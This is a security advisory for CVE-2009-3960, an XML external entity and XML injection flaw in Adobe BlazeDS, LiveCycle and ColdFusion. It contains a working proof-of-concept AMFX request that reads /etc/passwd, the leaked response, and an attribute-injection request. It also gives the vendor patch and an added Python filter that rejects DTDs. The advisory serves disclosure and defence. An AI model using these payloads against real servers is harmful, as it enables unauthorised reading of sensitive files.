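Adobe BlazeDS XML and XML External Entity Injection Vulnerability
Release date: 2010-02-11
Updated: 2010-03-08
Affected systems:
Adobe LiveCycle 9.0
Adobe LiveCycle 8.2.1
Adobe LiveCycle 8.0.1
Adobe ColdFusion 9.0
Adobe ColdFusion 8.0.1
Adobe ColdFusion 8
Adobe ColdFusion 7.0.2
Adobe BlazeDS 3.2
Adobe LiveCycle Data Services 3.0
Adobe LiveCycle Data Services 2.6.1
Adobe LiveCycle Data Services 2.5.1
Adobe Flex Data Services 2.0.1
Description:
BUGTRAQ ID: 38197
CVE ID: CVE-2009-3960
BlazeDS is a new open-source project from Adobe for remoting and web messaging (similar to JMS).
The Adobe Data Services components provide data messaging, remoting and management functions for Flex/RIA applications. HTTPChannel servlet classes such as mx.messaging.channels.HTTPChannel and mx.messaging.channels.SecureHTTPChannel do not properly filter the XML entities declared and included in AMFX requests. When the XML parser processes a malicious payload, this can result in XML injection and XML external entity injection, and a user can read sensitive information such as local files in the returned response.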
<*Source: Roberto Suggi Liverani
Links: http://secunia.com/advisories/38543
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html
*>
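Test method:
Warning
The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
XML External Entity Injection – Request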
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
XML External Entity Injection – Response
Response:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>
<body targetURI="/onResult" responseURI="">
<object type="flex.messaging.messages.AcknowledgeMessage">
<traits><string>timestamp</string><string>headers</string>
<string>body</string><string>correlationId</string>
<string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string>
</traits><double>1.257387140632E12</double><object>
<traits><string>DSMessagingVersion</string>
<string>DSId</string></traits><double>1.0</double>
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>
</object><null/><string>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
[...]
XML Injection – Request
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>
</body></amfx>
XML Injection – Response
AMF XML Response:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>
Recommendation:
Vendor patch:
Adobe
-----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:
http://www.adobe.com/support/security/bulletins/apsb10-05.html
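An added example, not part of the original advisory or of Adobe's patch: a pre-parse check that a filter in front of the message broker could apply to AMFX request bodies, rejecting any DOCTYPE declaration (and with it every entity declaration) and any <body> attribute outside an allow-list. The names check_amfx, verdict, RejectedAmfx and ALLOWED_BODY_ATTRS, the allow-list itself and the sample payloads are assumptions constructed for illustration.

```python
import xml.parsers.expat as expat

# Assumption: <body> legitimately carries only these attributes, as in
# the AMFX samples shown in this advisory.
ALLOWED_BODY_ATTRS = {"targetURI", "responseURI"}


class RejectedAmfx(ValueError):
    """The payload must not be handed to the real AMFX parser."""


def check_amfx(payload: bytes) -> None:
    """Raise RejectedAmfx on any DTD or unexpected <body> attribute."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # No DOCTYPE means no entity declarations, internal or external.
        raise RejectedAmfx("DOCTYPE declaration not allowed")

    def on_start(name, attrs):
        if name == "body":
            extra = sorted(set(attrs) - ALLOWED_BODY_ATTRS)
            if extra:
                raise RejectedAmfx("unexpected <body> attribute: " + ", ".join(extra))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    try:
        parser.Parse(payload, True)
    except expat.ExpatError as exc:
        # Also covers references to entities that were never declared.
        raise RejectedAmfx(f"malformed XML: {exc}") from exc


def verdict(payload: bytes) -> str:
    try:
        check_amfx(payload)
    except RejectedAmfx as exc:
        return f"reject: {exc}"
    return "accept"


# Constructed sample payloads (the entity target is a placeholder path).
PROLOG = b'<?xml version="1.0" encoding="utf-8"?>'
BENIGN = PROLOG + b'<amfx ver="3"><body targetURI="" responseURI="d"><null/></body></amfx>'
WITH_DTD = (PROLOG + b'<!DOCTYPE test [ <!ENTITY x3 SYSTEM "file:///placeholder"> ]>'
            b'<amfx ver="3"><body><string>&x3;</string></body></amfx>')
INJECTED = (PROLOG + b'<amfx ver="3"><body targetURI="" responseURI="d" '
            b'injectedattr="anything"><null/></body></amfx>')
```

A check like this complements the vendor patch on hosts that cannot be upgraded immediately; it does not replace it.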
